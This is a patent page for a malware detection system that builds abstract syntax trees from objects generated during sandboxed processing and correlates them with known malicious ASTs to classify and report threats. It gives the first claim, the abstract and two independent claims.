Enhanced malware detection for generated objects
First Claim
1. A system to detect malware generated by an object, the system comprising:
- a storage device;
one or more processors communicatively coupled to the storage device, the one or more processors configured to execute dynamic analysis logic, an Abstract Syntax Tree (AST) generator, a correlation engine, a classification engine and a reporting engine, whereinthe dynamic analysis logic, stored in the storage device and configured with a monitoring logic, to process the object and identify features associated with the processing of the object, detect an object generated during the processing of the object, and provide the generated object to the AST generator and the correlation engine;
the AST generator, stored in the storage device, being configured to receive the generated object, generate an AST representation of the generated object and remove one or more parameters from the AST representation prior to providing the AST representation to the correlation engine;
the correlation engine, stored in the storage device, being configured to (i) receive the features generated during the processing of the object by the dynamic analysis logic and the AST representation and (ii) perform a correlation of at least the AST representation with a labeled set of one or more ASTs associated with known malicious objects, to generate a likelihood of maliciousness;
the classification engine, stored in the storage device, being configured to receive from the correlation engine the likelihood of maliciousness associated with the generated object and the AST representation, and classifying the object as malicious in response to the correlation; and
the reporting engine being configured to generate and issue alerts in response to the object being classified as malicious by the classification engine.
7 Assignments
0 Petitions
Accused Products
Abstract
A computerized method to identify malicious code generated by seemingly benign objects is described. The generated malware detection system described identifies generated objects (code) and analyzes each generated object to collect features which may be associated with maliciousness. The analysis may determine if an Abstract Syntax Tree (AST) representation of the generated object is correlated with known malware ASTs. Correlation of the features identified during processing of the generated objects, including the sequences of generated object, may be used in classifying the object as malicious. The malware detection system may communicate with the one or more endpoint devices to influence detection and reporting of behaviors and malware by those device(s).
-
Citations
22 Claims
-
1. A system to detect malware generated by an object, the system comprising:
-
a storage device; one or more processors communicatively coupled to the storage device, the one or more processors configured to execute dynamic analysis logic, an Abstract Syntax Tree (AST) generator, a correlation engine, a classification engine and a reporting engine, wherein the dynamic analysis logic, stored in the storage device and configured with a monitoring logic, to process the object and identify features associated with the processing of the object, detect an object generated during the processing of the object, and provide the generated object to the AST generator and the correlation engine; the AST generator, stored in the storage device, being configured to receive the generated object, generate an AST representation of the generated object and remove one or more parameters from the AST representation prior to providing the AST representation to the correlation engine; the correlation engine, stored in the storage device, being configured to (i) receive the features generated during the processing of the object by the dynamic analysis logic and the AST representation and (ii) perform a correlation of at least the AST representation with a labeled set of one or more ASTs associated with known malicious objects, to generate a likelihood of maliciousness; the classification engine, stored in the storage device, being configured to receive from the correlation engine the likelihood of maliciousness associated with the generated object and the AST representation, and classifying the object as malicious in response to the correlation; and the reporting engine being configured to generate and issue alerts in response to the object being classified as malicious by the classification engine. - View Dependent Claims (2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15)
-
-
16. A computerized method for detecting a generated malware cyber-attack, the method comprising:
-
monitoring the processing of a first object in a virtual machine of a malware detection system; and responsive to detecting a second object generated during processing of the first object by an application operating within the virtual machine, where the second object is different than the first object, providing the generated second object to an Abstract Syntax Tree (AST) generator; generating an AST representation by the AST generator for the received generated second object and providing the AST representation to a correlation engine; determining correlation results, by the correlation engine, based at least in part on the received AST representation and providing the correlation results to a classification engine; and classifying, by the classification engine, the first object as malicious in response to the received correlation results exceeding a maliciousness threshold. - View Dependent Claims (17, 18, 19, 20, 21, 22)
-
Specification